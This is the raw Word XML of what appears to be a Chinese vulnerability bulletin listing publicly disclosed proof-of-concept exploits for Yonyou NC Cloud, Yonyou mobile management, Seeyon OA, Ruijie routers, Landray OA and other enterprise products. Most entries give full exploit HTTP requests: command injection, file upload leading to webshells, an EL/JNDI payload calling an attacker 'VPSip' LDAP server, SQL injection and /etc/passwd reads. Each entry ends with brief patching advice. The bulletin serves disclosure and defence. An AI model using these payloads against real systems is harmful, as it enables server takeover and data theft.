        <w:t>漏洞详情：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POST /user_management/sichuan_login HTTP/1.1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Host: xxxx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Cookie: csrftoken=wlQmJ3qina0cTNKvaEZIiiCiNKQwsqefyVnwO4pUtCZ86LZX2odCCUaTgV9TIBSG; language=zh; isms_web=r7nlo6ldph6x2wkstd97w02merluudmz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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0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Accept: application/json, text/javascript, */*; q=0.01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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Accept-Encoding: gzip, deflate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Content-Type: application/x-www-form-urlencoded; charset=UTF-8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X-Csrftoken: wlQmJ3qina0cTNKvaEZIiiCiNKQwsqefyVnwO4pUtCZ86LZX2odCCUaTgV9TIBSG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X-Requested-With: XMLHttpRequest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Content-Length: 88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Sec-Fetch-Dest: empty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Sec-Fetch-Mode: cors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Sec-Fetch-Site: same-origin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Te: trailers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Connection: close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</w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
                <w:b/>
                <w:bCs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loginname=sysadmin&amp;ticket=|echo aaaa &gt;/adm/isms_web/static/base_static/js/aodun/test.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>处置建议：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>升级版本或安装厂商官方补丁，用于提升系统自身安全性，同时，可通过安全设备快速感知漏洞利用行为并进行预警或阻断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pP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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>（已公开poc）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t xml:space="preserve">用友 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t xml:space="preserve">NC Cloud jsinvoke </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>任意文件上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Hlk142596792"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>用友</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t xml:space="preserve"> NC Cloud jsinvoke 接口存在任意文件上传漏洞，攻击者通过漏洞可以上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>任意文件至服务器中，获取系统权限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等级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>高危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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>最新版本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详情：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="8"/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bookmarkStart w:id="9" w:name="_Hlk142596826"/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POST /uapjs/jsinvoke/?action=invoke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Content-Type: application/json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{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"serviceName":"nc.itf.iufo.IBaseSPService",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"methodName":"saveXStreamConfig",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"parameterTypes":[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"java.lang.Object",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"java.lang.String"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],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"parameters":[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"${param.getClass().forName(param.error).newInstance().eval(param.cmd)}",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"webapps/nc_web/407.jsp"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]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}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POST /uapjs/jsinvoke/?action=invoke HTTP/1.1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Host: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Connection: Keep-Alive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Content-Length: 253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Content-Type: application/x-www-form-urlencoded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{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","paramete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rTypes":["java.lang.Object","java.lang.String"],"parameters":["${''.getClass().forName('javax. </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left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naming.InitialContext').newInstance().lookup('ldap://VPSip:1389/TomcatBypass/TomcatE </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
                <w:b/>
                <w:bCs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cho')}","webapps/nc_web/301.jsp"]}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="9"/>
    </w:tbl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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1876425"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="1751430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3024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/>
                <w:b/>
                <w:bCs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/cmdtest.jsp?error=bsh.Interpreter&amp;cmd=org.apache.commons.io.IOUtils.toString(Runtime. getRuntime().exec(%22whoami%22).getInputStream())</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1367790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1526851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51040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处置建议：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>（已公开poc）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>用友</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>移动管理系</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t xml:space="preserve"> uploadApk.do 任意文件上传漏</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Hlk142597786"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>用友</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>移动管理系统 uploadApk.do 接口存在任意文件上传漏洞，攻击者通过漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>可以获取服务器权限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等级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>高危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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>最新版本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详情：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POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1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Host: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Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO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3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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,im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age/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7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Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server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Connection: close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------WebKitFormBoundaryvLTG6zlX0gZ8LzO3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Content-Disposition:form-data;name="downloadpath"; filename="a.jsp" Content-Type: application/msword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hello</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
                <w:b/>
                <w:bCs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------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1806575"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="229309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09028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/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/maupload/apk/a.jsp</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/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处置建议：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>辰信景云终端安全管理系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>login SQL注入漏洞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描述：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>辰信景云终端安全管理系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>login SQL注入漏洞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等级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>高危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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>最新版本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详情：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POST /api/user/login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captcha=&amp;password=21232f297a57a5a743894a0e4a801fc3&amp;username=admin'and(select*f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rom(select+sleep(3))a)='</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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处置建议：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pP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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>致远</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t xml:space="preserve"> OA 协同管理软件无需登录getshell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描述：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>致远 OA 协同管理软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>存在绕过登录漏洞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等级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>高危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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>最新版本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详情：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</w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>：ip/seeyon/htmlofficeservlet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>如果出现下图所示的内容，表示存在漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="309880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1438391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9160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bookmarkStart w:id="11" w:name="_Hlk142598360"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV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OPTION=S3WYOSWLBSGr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currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66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CREATEDATE=wUghPB3szB3Xwg66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RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6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originalFileId=wV66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originalCreateDate=wUghPB3szB3Xwg66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FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2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dEg6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needReadFile=yRWZdAS6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originalCreateDate=wLSGP4oEzLKAz4=iz=66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webshell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/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>访问</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> webshell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="11"/>
    </w:tbl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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5019040" cy="1009015"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="440158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5859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处置建议：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>锐捷</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ruijie 路由器命令执行-CVE-2023-3450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描述：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>锐捷 Ruijie 路由器命令执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>存在命令执行漏洞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等级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>高危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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>.5.13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详情：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color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该漏洞属于后台漏洞，需要输入密码进入后台（默认密码 admin）</w:t>
      </w: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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="4567555"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1175728688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28688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</w:rPr>
        <w:t>点击左下角的“网络诊断”，在“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>Tracert 检测”的“地址”框中，输入 127.0.0.1;cat /etc/passwd，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>接着点击“开始检测”，会在检测框中回显命令执行结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1922780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="6822562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627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/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>127.0.0.1|id</w:t>
      </w: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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2451100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="176128842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8423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</w:rPr>
        <w:t>命令执行数据包</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7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GET /cgi-bin/luci/;stok=9ba3cc411c1cd8cf7773a2df4ec43d65/admin/diagnosis?diag=tracer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t&amp;tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&amp;seq=1 HTTP/1.1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Host: IP:PORT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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/1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15.0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Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Accept-Encoding: gzip, deflate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X-Requested-With: XMLHttpRequest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DNT: 1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Connection: close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Referer: http://IP:PORT/cgi-bin/luci/;stok=9ba3cc411c1cd8cf7773a2df4ec43d65/admin/diag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nosis</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr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Cookie: sysauth=b0d95241b0651d5fbaac5de8dabd2110</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1755775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="130627223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72231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/>
        </w:rPr>
      </w:pP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处置建议：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>目前厂商已发布升级补丁修复漏洞，补丁获取链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>https://www.ruijie.com.cn/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>该漏洞由于正常功能过滤不严格导致存在命令注入，并且需要高权限账号登录操作，建议修改登录密码为强口令，通过白名单控制访问原地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pP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ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Hlk142598621"/>
      <w:bookmarkStart w:id="13" w:name="_Hlk142598822"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>（已公开poc）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>蓝凌</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t xml:space="preserve"> oa 前台代码执行漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>CNVD-2021-28277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描述：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>蓝凌 oa 前台</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>代码执行漏洞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等级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>高危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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>漏洞详情：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="7938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938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938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POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1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Host: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User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)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Accept: */* Connection: Keep-Alive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Content-Length: 42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Content-Type: application/x-www-form-urlencoded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var={"body":{"file":"file:///etc/passwd"}}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2324100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="91361806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18068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处置建议：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>升级版本或安装厂商官方补丁，用于提升系统自身安全性，同时，可通过安全设备快速感知漏洞利用行为并进行预警或阻断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="13"/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pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>（已公开poc）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>安恒明御运维审计与风险控制系统堡垒机任意用户注册漏洞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描述：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>安恒明御运维审计与风险控制系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>存在任意用户注册漏洞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漏洞等级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
    </w:p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影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>漏洞详情：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
